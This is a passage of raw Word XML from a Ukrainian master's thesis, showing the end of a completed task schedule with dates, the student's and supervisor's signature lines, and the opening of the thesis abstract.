            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>веб-додатку</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67EBB2BF" w14:textId="0B3EF5C7" w:rsidR="00466851" w:rsidRPr="00A92302" w:rsidRDefault="00A92302" w:rsidP="00A92302">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1"/>
              <w:ind w:left="9" w:right="85"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>03.01.20-10.01.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58354551" w14:textId="7B7EC7C5" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF58E4">
              <w:rPr>
                <w:i/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Виконано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00466851" w:rsidRPr="0061042F" w14:paraId="3CA61F30" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="617" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BFB3BAA" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
                <w:tab w:val="left" w:pos="142"/>
                <w:tab w:val="left" w:pos="240"/>
              </w:tabs>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="302CC7FE" w14:textId="2F4A83F3" w:rsidR="00466851" w:rsidRPr="00466851" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:spacing w:beforeAutospacing="1"/>
              <w:ind w:left="34" w:right="201"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Перевірити ефективність програмної р</w:t>
            </w:r>
            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>е</w:t>
            </w:r>
            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>алізації</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41012FF1" w14:textId="7809D59B" w:rsidR="00466851" w:rsidRPr="00A92302" w:rsidRDefault="00A92302" w:rsidP="00A92302">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1"/>
              <w:ind w:left="9" w:right="85"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>11.01.20-15.01.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65991421" w14:textId="49C2CBF9" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF58E4">
              <w:rPr>
                <w:i/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Виконано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00466851" w:rsidRPr="0061042F" w14:paraId="06B3E018" w14:textId="77777777" w:rsidTr="00FF6E1E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="617" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C074F2D" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
                <w:tab w:val="left" w:pos="142"/>
                <w:tab w:val="left" w:pos="240"/>
              </w:tabs>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5451" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F7549EA" w14:textId="32A16E11" w:rsidR="00466851" w:rsidRPr="00466851" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Оформити пояснювальну записку</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61A1644E" w14:textId="6F53CD8D" w:rsidR="00466851" w:rsidRPr="00A92302" w:rsidRDefault="00A92302" w:rsidP="00A92302">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1"/>
              <w:ind w:left="9" w:right="85"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>16.01.20-18.01.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0791FD6C" w14:textId="5117EF97" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF58E4">
              <w:rPr>
                <w:i/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Виконано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00466851" w:rsidRPr="0061042F" w14:paraId="33C44B0D" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="617" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DA8B39D" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
                <w:tab w:val="left" w:pos="142"/>
                <w:tab w:val="left" w:pos="240"/>
              </w:tabs>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BFF5F09" w14:textId="22A7A1CB" w:rsidR="00466851" w:rsidRPr="00466851" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Оформити  презентацію</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EED9D4E" w14:textId="4FDCBFE5" w:rsidR="00466851" w:rsidRPr="00A92302" w:rsidRDefault="00A92302" w:rsidP="00A92302">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1"/>
              <w:ind w:left="9" w:right="85"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>19.01.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CB8ACA6" w14:textId="1E4F4F6C" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF58E4">
              <w:rPr>
                <w:i/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Виконано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00466851" w:rsidRPr="0061042F" w14:paraId="7B5E2C27" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="617" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C7FF709" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
                <w:tab w:val="left" w:pos="142"/>
                <w:tab w:val="left" w:pos="240"/>
              </w:tabs>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2434C86C" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="00466851" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Отримання рецензій від рецензента</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17F99AE6" w14:textId="5C72ACD8" w:rsidR="00466851" w:rsidRPr="00A92302" w:rsidRDefault="00A92302" w:rsidP="00A92302">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>30.10.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DB81DDA" w14:textId="63A6945C" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF58E4">
              <w:rPr>
                <w:i/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Виконано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00466851" w:rsidRPr="0061042F" w14:paraId="29765F78" w14:textId="77777777" w:rsidTr="00C10923">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="617" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66D0CCF3" w14:textId="77777777" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="-142"/>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:ind w:left="142"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73537EFC" w14:textId="329AE86A" w:rsidR="00466851" w:rsidRPr="00466851" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466851">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Підготовитись до захисту в ЕК</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="653B7B49" w14:textId="77371DFC" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556827">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>04.02.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35F59588" w14:textId="08967B1F" w:rsidR="00466851" w:rsidRPr="0061042F" w:rsidRDefault="00466851" w:rsidP="00466851">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF58E4">
              <w:rPr>
                <w:i/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Виконано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45772400" w14:textId="06ACDC4F" w:rsidR="00BF1B1F" w:rsidRDefault="00BF1B1F" w:rsidP="00BF1B1F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="308C810A" w14:textId="77777777" w:rsidR="00BF1B1F" w:rsidRPr="00BF1B1F" w:rsidRDefault="00BF1B1F" w:rsidP="00BF1B1F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A9536C" w14:textId="0E6321AB" w:rsidR="002908D0" w:rsidRDefault="002908D0" w:rsidP="00BF1B1F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:pos="4253"/>
          <w:tab w:val="left" w:pos="5529"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C0F49C8" w14:textId="418E3B06" w:rsidR="00BF1B1F" w:rsidRDefault="00BF1B1F" w:rsidP="00BF1B1F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:pos="4253"/>
          <w:tab w:val="left" w:pos="5529"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="087B25F5" w14:textId="776BD422" w:rsidR="00BF1B1F" w:rsidRDefault="00BF1B1F" w:rsidP="00BF1B1F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:pos="4253"/>
          <w:tab w:val="left" w:pos="5529"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EB61C07" w14:textId="2B5E262A" w:rsidR="00BF1B1F" w:rsidRDefault="00BF1B1F" w:rsidP="00BF1B1F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:pos="4253"/>
          <w:tab w:val="left" w:pos="5529"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A4C867" w14:textId="31A8DF80" w:rsidR="00BF1B1F" w:rsidRDefault="00BF1B1F" w:rsidP="00BF1B1F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="1985"/>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:pos="4253"/>
          <w:tab w:val="left" w:pos="5529"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3693014D" w14:textId="5801BB5A" w:rsidR="00BF1B1F" w:rsidRDefault="00BF1B1F" w:rsidP="00BF1B1F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Магістрант</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
        <w:t>В. Михайловський</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557D5E56" w14:textId="0CE079EA" w:rsidR="00BF1B1F" w:rsidRDefault="00BF1B1F" w:rsidP="00BF1B1F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(підпис, дата)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EF55DE" w14:textId="0CBDECAF" w:rsidR="00BF1B1F" w:rsidRDefault="00BF1B1F" w:rsidP="00BF1B1F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2DB08A" w14:textId="70B2DE8C" w:rsidR="00BF1B1F" w:rsidRDefault="00BF1B1F" w:rsidP="00BF1B1F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Науковий керівник</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
        <w:t>О. Азаренко</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191083FE" w14:textId="347C8F58" w:rsidR="00BF1B1F" w:rsidRDefault="00BF1B1F" w:rsidP="00BF1B1F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(підпис, дата)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A5ABD1" w14:textId="77777777" w:rsidR="00CA7357" w:rsidRDefault="00CA7357" w:rsidP="00BA42BB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="537E2E67" w14:textId="24ADC685" w:rsidR="009F1C8E" w:rsidRPr="00BA42BB" w:rsidRDefault="00D84A9A" w:rsidP="00BA42BB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC71A88" w14:textId="77777777" w:rsidR="009F1C8E" w:rsidRDefault="009F1C8E" w:rsidP="009F1C8E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6663"/>
          <w:tab w:val="left" w:pos="8789"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>РЕФЕРАТ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE341E5" w14:textId="77777777" w:rsidR="009F1C8E" w:rsidRDefault="009F1C8E" w:rsidP="009F1C8E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6663"/>
          <w:tab w:val="left" w:pos="8789"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34BFC25F" w14:textId="4C9FE2AF" w:rsidR="00D84A9A" w:rsidRDefault="009F1C8E" w:rsidP="009F1C8E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466851">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Магістерська атестаційна робота складається зі вступу, </w:t>
      </w:r>
      <w:r w:rsidR="00466851">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">основної частини, що містить 3 розділи, загальних висновків і списку використаних джерел, додатків і має </w:t>
      </w:r>
      <w:r w:rsidR="00603AE5" w:rsidRPr="00603AE5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>88</w:t>
      </w:r>
      <w:r w:rsidR="00466851">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> сторін</w:t>
      </w:r>
      <w:r w:rsidR="00603AE5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ок</w:t>
      </w:r>
      <w:r w:rsidR="00466851">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
